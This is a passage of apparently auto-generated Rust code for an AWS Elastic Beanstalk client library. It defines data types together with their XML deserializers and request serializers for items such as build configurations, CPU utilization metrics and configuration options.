Some(try!(ActionTypeDeserializer::deserialize("ActionType", stack))); } "Status" => { obj.status = Some(try!(StringDeserializer::deserialize("Status", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type AutoCreateApplication = bool; #[doc="<p>Describes an Auto Scaling launch configuration.</p>"] #[derive(Default,Debug,Clone)] pub struct AutoScalingGroup { #[doc="<p>The name of the <code>AutoScalingGroup</code> . </p>"] pub name: Option<ResourceId>, } struct AutoScalingGroupDeserializer; impl AutoScalingGroupDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AutoScalingGroup, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = AutoScalingGroup::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type AutoScalingGroupList = Vec<AutoScalingGroup>; struct AutoScalingGroupListDeserializer; impl AutoScalingGroupListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AutoScalingGroupList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(AutoScalingGroupDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type AvailableSolutionStackDetailsList = Vec<SolutionStackDescription>; struct AvailableSolutionStackDetailsListDeserializer; impl AvailableSolutionStackDetailsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AvailableSolutionStackDetailsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(SolutionStackDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type AvailableSolutionStackNamesList = Vec<SolutionStackName>; struct AvailableSolutionStackNamesListDeserializer; impl AvailableSolutionStackNamesListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<AvailableSolutionStackNamesList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(SolutionStackNameDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type BoxedBoolean = bool; struct BoxedBooleanDeserializer; impl BoxedBooleanDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<BoxedBoolean, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type BoxedInt = i64; struct BoxedIntDeserializer; impl BoxedIntDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<BoxedInt, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Settings for an AWS CodeBuild build.</p>"] #[derive(Default,Debug,Clone)] pub struct BuildConfiguration { #[doc="<p>The name of the artifact of the CodeBuild build. If provided, Elastic Beanstalk stores the build artifact in the S3 location <i>S3-bucket</i>/resources/<i>application-name</i>/codebuild/codebuild-<i>version-label</i>-<i>artifact-name</i>.zip. If not provided, Elastic Beanstalk stores the build artifact in the S3 location <i>S3-bucket</i>/resources/<i>application-name</i>/codebuild/codebuild-<i>version-label</i>.zip. </p>"] pub artifact_name: Option<String>, #[doc="<p>The Amazon Resource Name (ARN) of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.</p>"] pub code_build_service_role: NonEmptyString, #[doc="<p>Information about the compute resources the build project will use.</p> <ul> <li> <p> <code>BUILD_GENERAL1_SMALL: Use up to 3 GB memory and 2 vCPUs for builds</code> </p> </li> <li> <p> <code>BUILD_GENERAL1_MEDIUM: Use up to 7 GB memory and 4 vCPUs for builds</code> </p> </li> <li> <p> <code>BUILD_GENERAL1_LARGE: Use up to 15 GB memory and 8 vCPUs for builds</code> </p> </li> </ul>"] pub compute_type: Option<ComputeType>, #[doc="<p>The ID of the Docker image to use for this build project.</p>"] pub image: NonEmptyString, #[doc="<p>How long in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait until timing out any related build that does not get marked as completed. The default is 60 minutes.</p>"] pub timeout_in_minutes: Option<BoxedInt>, } /// Serialize `BuildConfiguration` contents to a `SignedRequest`. struct BuildConfigurationSerializer; impl BuildConfigurationSerializer { fn serialize(params: &mut Params, name: &str, obj: &BuildConfiguration) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.artifact_name { params.put(&format!("{}{}", prefix, "ArtifactName"), &field_value); } params.put(&format!("{}{}", prefix, "CodeBuildServiceRole"), &obj.code_build_service_role); if let Some(ref field_value) = obj.compute_type { params.put(&format!("{}{}", prefix, "ComputeType"), &field_value); } params.put(&format!("{}{}", prefix, "Image"), &obj.image); if let Some(ref field_value) = obj.timeout_in_minutes { params.put(&format!("{}{}", prefix, "TimeoutInMinutes"), &field_value.to_string()); } } } #[doc="<p>CPU utilization metrics for an instance.</p>"] #[derive(Default,Debug,Clone)] pub struct CPUUtilization { #[doc="<p>Percentage of time that the CPU has spent in the <code>I/O Wait</code> state over the last 10 seconds.</p>"] pub io_wait: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>IRQ</code> state over the last 10 seconds.</p>"] pub irq: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>Idle</code> state over the last 10 seconds.</p>"] pub idle: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>Nice</code> state over the last 10 seconds.</p>"] pub nice: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>SoftIRQ</code> state over the last 10 seconds.</p>"] pub soft_irq: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>System</code> state over the last 10 seconds.</p>"] pub system: Option<NullableDouble>, #[doc="<p>Percentage of time that the CPU has spent in the <code>User</code> state over the last 10 seconds.</p>"] pub user: Option<NullableDouble>, } struct CPUUtilizationDeserializer; impl CPUUtilizationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CPUUtilization, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = CPUUtilization::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "IOWait" => { obj.io_wait = Some(try!(NullableDoubleDeserializer::deserialize("IOWait", stack))); } "IRQ" => { obj.irq = Some(try!(NullableDoubleDeserializer::deserialize("IRQ", stack))); } "Idle" => { obj.idle = Some(try!(NullableDoubleDeserializer::deserialize("Idle", stack))); } "Nice" => { obj.nice = Some(try!(NullableDoubleDeserializer::deserialize("Nice", stack))); } "SoftIRQ" => { obj.soft_irq = Some(try!(NullableDoubleDeserializer::deserialize("SoftIRQ", stack))); } "System" => { obj.system = Some(try!(NullableDoubleDeserializer::deserialize("System", stack))); } "User" => { obj.user = Some(try!(NullableDoubleDeserializer::deserialize("User", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type Cause = String; struct CauseDeserializer; impl CauseDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Cause, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type Causes = Vec<Cause>; struct CausesDeserializer; impl CausesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Causes, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(CauseDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Results message indicating whether a CNAME is available.</p>"] #[derive(Default,Debug,Clone)] pub struct CheckDNSAvailabilityMessage { #[doc="<p>The prefix used when this CNAME is reserved.</p>"] pub cname_prefix: DNSCnamePrefix, } /// Serialize `CheckDNSAvailabilityMessage` contents to a `SignedRequest`. struct CheckDNSAvailabilityMessageSerializer; impl CheckDNSAvailabilityMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CheckDNSAvailabilityMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "CNAMEPrefix"), &obj.cname_prefix); } } #[doc="<p>Indicates if the specified CNAME is available.</p>"] #[derive(Default,Debug,Clone)] pub struct CheckDNSAvailabilityResultMessage { #[doc="<p>Indicates if the specified CNAME is available:</p> <ul> <li> <p> <code>true</code> : The CNAME is available.</p> </li> <li> <p> <code>false</code> : The CNAME is not available.</p> </li> </ul>"] pub available: Option<CnameAvailability>, #[doc="<p>The fully qualified CNAME to reserve when <a>CreateEnvironment</a> is called with the provided prefix.</p>"] pub fully_qualified_cname: Option<DNSCname>, } struct CheckDNSAvailabilityResultMessageDeserializer; impl CheckDNSAvailabilityResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CheckDNSAvailabilityResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = CheckDNSAvailabilityResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Available" => { obj.available = Some(try!(CnameAvailabilityDeserializer::deserialize("Available", stack))); } "FullyQualifiedCNAME" => { obj.fully_qualified_cname = Some(try!(DNSCnameDeserializer::deserialize("FullyQualifiedCNAME", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type CnameAvailability = bool; struct CnameAvailabilityDeserializer; impl CnameAvailabilityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CnameAvailability, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to create or update a group of environments.</p>"] #[derive(Default,Debug,Clone)] pub struct ComposeEnvironmentsMessage { #[doc="<p>The name of the application to which the specified source bundles belong.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the group to which the target environments belong. Specify a group name only if the environment name defined in each target environment's manifest ends with a + (plus) character. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] pub group_name: Option<GroupName>, #[doc="<p>A list of version labels, specifying one or more application source bundles that belong to the target application. Each source bundle must include an environment manifest that specifies the name of the environment and the name of the solution stack to use, and optionally can specify environment links to create.</p>"] pub version_labels: Option<VersionLabels>, } /// Serialize `ComposeEnvironmentsMessage` contents to a `SignedRequest`. struct ComposeEnvironmentsMessageSerializer; impl ComposeEnvironmentsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &ComposeEnvironmentsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.group_name { params.put(&format!("{}{}", prefix, "GroupName"), &field_value); } if let Some(ref field_value) = obj.version_labels { VersionLabelsSerializer::serialize( params, &format!("{}{}", prefix, "VersionLabels"), field_value, ); } } } pub type ComputeType = String; pub type ConfigurationDeploymentStatus = String; struct ConfigurationDeploymentStatusDeserializer; impl ConfigurationDeploymentStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationDeploymentStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionDefaultValue = String; struct ConfigurationOptionDefaultValueDeserializer; impl ConfigurationOptionDefaultValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionDefaultValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the possible values for a configuration option.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationOptionDescription { #[doc="<p>An indication of which action is required if the value for this configuration option changes:</p> <ul> <li> <p> <code>NoInterruption</code> : There is no interruption to the environment or application availability.</p> </li> <li> <p> <code>RestartEnvironment</code> : The environment is entirely restarted, all AWS resources are deleted and recreated, and the environment is unavailable during the process.</p> </li> <li> <p> <code>RestartApplicationServer</code> : The environment is available the entire time. However, a short application outage occurs when the application servers on the running Amazon EC2 instances are restarted.</p> </li> </ul>"] pub change_severity: Option<ConfigurationOptionSeverity>, #[doc="<p>The default value for this configuration option.</p>"] pub default_value: Option<ConfigurationOptionDefaultValue>, #[doc="<p>If specified, the configuration option must be a string value no longer than this value.</p>"] pub max_length: Option<OptionRestrictionMaxLength>, #[doc="<p>If specified, the configuration option must be a numeric value less than this value.</p>"] pub max_value: Option<OptionRestrictionMaxValue>, #[doc="<p>If specified, the configuration option must be a numeric value greater than this value.</p>"] pub min_value: Option<OptionRestrictionMinValue>, #[doc="<p>The name of the configuration option.</p>"] pub name: Option<ConfigurationOptionName>, #[doc="<p>A unique namespace identifying the option's associated AWS resource.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>If specified, the configuration option must be a string value that satisfies this regular expression.</p>"] pub regex: Option<OptionRestrictionRegex>, #[doc="<p>An indication of whether the user defined this configuration option:</p> <ul> <li> <p> <code>true</code> : This configuration option was defined by the user. It is a valid choice for specifying if this as an <code>Option to Remove</code> when updating configuration settings. </p> </li> <li> <p> <code>false</code> : This configuration was not defined by the user.</p> </li> </ul> <p> Constraint: You can remove only <code>UserDefined</code> options from a configuration. </p> <p> Valid Values: <code>true</code> | <code>false</code> </p>"] pub user_defined: Option<UserDefinedOption>, #[doc="<p>If specified, values for the configuration option are selected from this list.</p>"] pub value_options: Option<ConfigurationOptionPossibleValues>, #[doc="<p>An indication of which type of values this option has and whether it is allowable to select one or more than one of the possible values:</p> <ul> <li> <p> <code>Scalar</code> : Values for this option are a single selection from the possible values, or an unformatted string, or numeric value governed by the <code>MIN/MAX/Regex</code> constraints.</p> </li> <li> <p> <code>List</code> : Values for this option are multiple selections from the possible values.</p> </li> <li> <p> <code>Boolean</code> : Values for this option are either <code>true</code> or <code>false</code> .</p> </li> <li> <p> <code>Json</code> : Values for this option are a JSON representation of a <code>ConfigDocument</code>.</p> </li> </ul>"] pub value_type: Option<ConfigurationOptionValueType>, } struct ConfigurationOptionDescriptionDeserializer; impl ConfigurationOptionDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationOptionDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ChangeSeverity" => { obj.change_severity = Some(try!(ConfigurationOptionSeverityDeserializer::deserialize("ChangeSeverity", stack))); } "DefaultValue" => { obj.default_value = Some(try!(ConfigurationOptionDefaultValueDeserializer::deserialize("DefaultValue", stack))); } "MaxLength" => { obj.max_length = Some(try!(OptionRestrictionMaxLengthDeserializer::deserialize("MaxLength", stack))); } "MaxValue" => { obj.max_value = Some(try!(OptionRestrictionMaxValueDeserializer::deserialize("MaxValue", stack))); } "MinValue" => { obj.min_value = Some(try!(OptionRestrictionMinValueDeserializer::deserialize("MinValue", stack))); } "Name" => { obj.name = Some(try!(ConfigurationOptionNameDeserializer::deserialize("Name", stack))); } "Namespace" => { obj.namespace = Some(try!(OptionNamespaceDeserializer::deserialize("Namespace", stack))); } "Regex" => { obj.regex = Some(try!(OptionRestrictionRegexDeserializer::deserialize("Regex", stack))); } "UserDefined" => { obj.user_defined = Some(try!(UserDefinedOptionDeserializer::deserialize("UserDefined", stack))); } "ValueOptions" => { obj.value_options = Some(try!(ConfigurationOptionPossibleValuesDeserializer::deserialize("ValueOptions", stack))); } "ValueType" => { obj.value_type = Some(try!(ConfigurationOptionValueTypeDeserializer::deserialize("ValueType", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionDescriptionsList = Vec<ConfigurationOptionDescription>; struct ConfigurationOptionDescriptionsListDeserializer; impl ConfigurationOptionDescriptionsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionDescriptionsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationOptionDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type ConfigurationOptionName = String; struct ConfigurationOptionNameDeserializer; impl ConfigurationOptionNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionPossibleValue = String; struct ConfigurationOptionPossibleValueDeserializer; impl ConfigurationOptionPossibleValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionPossibleValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionPossibleValues = Vec<ConfigurationOptionPossibleValue>; struct ConfigurationOptionPossibleValuesDeserializer; impl ConfigurationOptionPossibleValuesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionPossibleValues, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationOptionPossibleValueDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p> A specification identifying an individual configuration option along with its current value. For a list of possible option values, go to <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/command-options.html\">Option Values</a> in the <i>AWS Elastic Beanstalk Developer Guide</i>. </p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationOptionSetting { #[doc="<p>A unique namespace identifying the option's associated AWS resource.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>The name of the configuration option.</p>"] pub option_name: Option<ConfigurationOptionName>, #[doc="<p>A unique resource name for a time-based scaling configuration option.</p>"] pub resource_name: Option<ResourceName>, #[doc="<p>The current value for the configuration option.</p>"] pub value: Option<ConfigurationOptionValue>, } struct ConfigurationOptionSettingDeserializer; impl ConfigurationOptionSettingDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionSetting, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationOptionSetting::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Namespace" => { obj.namespace = Some(try!(OptionNamespaceDeserializer::deserialize("Namespace", stack))); } "OptionName" => { obj.option_name = Some(try!(ConfigurationOptionNameDeserializer::deserialize("OptionName", stack))); } "ResourceName" => { obj.resource_name = Some(try!(ResourceNameDeserializer::deserialize("ResourceName", stack))); } "Value" => { obj.value = Some(try!(ConfigurationOptionValueDeserializer::deserialize("Value", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `ConfigurationOptionSetting` contents to a `SignedRequest`. struct ConfigurationOptionSettingSerializer; impl ConfigurationOptionSettingSerializer { fn serialize(params: &mut Params, name: &str, obj: &ConfigurationOptionSetting) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.namespace { params.put(&format!("{}{}", prefix, "Namespace"), &field_value); } if let Some(ref field_value) = obj.option_name { params.put(&format!("{}{}", prefix, "OptionName"), &field_value); } if let Some(ref field_value) = obj.resource_name { params.put(&format!("{}{}", prefix, "ResourceName"), &field_value); } if let Some(ref field_value) = obj.value { params.put(&format!("{}{}", prefix, "Value"), &field_value); } } } pub type ConfigurationOptionSettingsList = Vec<ConfigurationOptionSetting>; struct ConfigurationOptionSettingsListDeserializer; impl ConfigurationOptionSettingsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionSettingsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationOptionSettingDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } /// Serialize `ConfigurationOptionSettingsList` contents to a `SignedRequest`. struct ConfigurationOptionSettingsListSerializer; impl ConfigurationOptionSettingsListSerializer { fn serialize(params: &mut Params, name: &str, obj: &ConfigurationOptionSettingsList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); ConfigurationOptionSettingSerializer::serialize(params, &key, obj); } } } pub type ConfigurationOptionSeverity = String; struct ConfigurationOptionSeverityDeserializer; impl ConfigurationOptionSeverityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionSeverity, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionValue = String; struct ConfigurationOptionValueDeserializer; impl ConfigurationOptionValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationOptionValueType = String; struct ConfigurationOptionValueTypeDeserializer; impl ConfigurationOptionValueTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionValueType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the settings for a specified configuration set.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationOptionsDescription { #[doc="<p> A list of <a>ConfigurationOptionDescription</a>. </p>"] pub options: Option<ConfigurationOptionDescriptionsList>, #[doc="<p>The name of the solution stack these configuration options belong to.</p>"] pub solution_stack_name: Option<SolutionStackName>, } struct ConfigurationOptionsDescriptionDeserializer; impl ConfigurationOptionsDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationOptionsDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationOptionsDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Options" => { obj.options = Some(try!(ConfigurationOptionDescriptionsListDeserializer::deserialize("Options", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the settings for a configuration set.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationSettingsDescription { #[doc="<p>The name of the application associated with this configuration set.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The date (in UTC time) when this configuration set was created.</p>"] pub date_created: Option<CreationDate>, #[doc="<p>The date (in UTC time) when this configuration set was last modified.</p>"] pub date_updated: Option<UpdateDate>, #[doc="<p> If this configuration set is associated with an environment, the <code>DeploymentStatus</code> parameter indicates the deployment status of this configuration set: </p> <ul> <li> <p> <code>null</code>: This configuration is not associated with a running environment.</p> </li> <li> <p> <code>pending</code>: This is a draft configuration that is not deployed to the associated environment but is in the process of deploying.</p> </li> <li> <p> <code>deployed</code>: This is the configuration that is currently deployed to the associated running environment.</p> </li> <li> <p> <code>failed</code>: This is a draft configuration that failed to successfully deploy.</p> </li> </ul>"] pub deployment_status: Option<ConfigurationDeploymentStatus>, #[doc="<p>Describes this configuration set.</p>"] pub description: Option<Description>, #[doc="<p> If not <code>null</code>, the name of the environment for this configuration set. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>A list of the configuration options and their values in this configuration set.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>The name of the solution stack this configuration set uses.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p> If not <code>null</code>, the name of the configuration template for this configuration set. </p>"] pub template_name: Option<ConfigurationTemplateName>, } struct ConfigurationSettingsDescriptionDeserializer; impl ConfigurationSettingsDescriptionDeserializer { 